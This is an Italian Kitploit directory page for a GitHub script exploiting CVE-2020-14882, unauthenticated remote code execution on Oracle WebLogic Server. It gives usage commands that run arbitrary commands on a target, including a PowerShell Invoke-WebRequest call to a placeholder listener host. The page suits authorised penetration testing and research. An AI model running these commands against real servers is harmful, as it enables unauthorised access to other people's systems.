Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-14882 — Questo script consente l'esecuzione di codice remoto (RCE) su Oracle WebLogic Server | Kitploit
Strumenti/GitHubGitHub/danny-lli/cve-2020-14882
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

Questo script consente l'esecuzione di codice remoto (RCE) su Oracle WebLogic Server

Vedi Repository
213 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-14882

Questo script consente l'esecuzione remota di codice (RCE) su Oracle WebLogic Server utilizzando una richiesta GET non autenticata. Sfrutta la vulnerabilità CVE-2020-14882. Eseguendo comandi arbitrari, un attaccante può ottenere accesso non autorizzato al server.

Dettagli dell'exploit

  • Titolo dell'exploit: Oracle WebLogic Server, RCE non autenticata tramite richiesta GET
  • Autore dell'exploit: Danny Safaya
  • CVE: CVE-2020-14882
  • Homepage del fornitore: Oracle WebLogic Server
  • Collegamento al software: Oracle Middleware Downloads
  • Maggiori informazioni: Analisi dell'RCE di WebLogic tramite una sola richiesta GET (CVE-2020-14882)

Utilizzo

Assicurati di avere Python 3 installato. Per utilizzare questo script, segui i passaggi seguenti:

  1. Apri un terminale o un prompt dei comandi.

  2. Esegui lo script utilizzando il seguente comando:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Sostituisci http(s)://target:7001 con l'URL di destinazione del server Oracle WebLogic e command con il comando desiderato da eseguire.

    Esempio 1:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
    

    Questo esempio esegue il comando nslookup your_Domain sul server di destinazione.

    Esempio 2:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
    

    Questo esempio esegue il comando PowerShell Invoke-WebRequest -Uri http://your_listener sul server di destinazione.

Avvertenza

Questo script è destinato esclusivamente a test di penetrazione autorizzati e a scopi di ricerca sulla sicurezza. L'uso non autorizzato di questo script per sfruttare sistemi senza il dovuto consenso è illegale e può comportare conseguenze legali. Utilizzalo a tuo rischio.

Dipendenze

Questo script richiede le seguenti dipendenze:

  • requests
  • urllib3

Assicurati che queste dipendenze siano installate prima di eseguire lo script.


Scarica lo strumento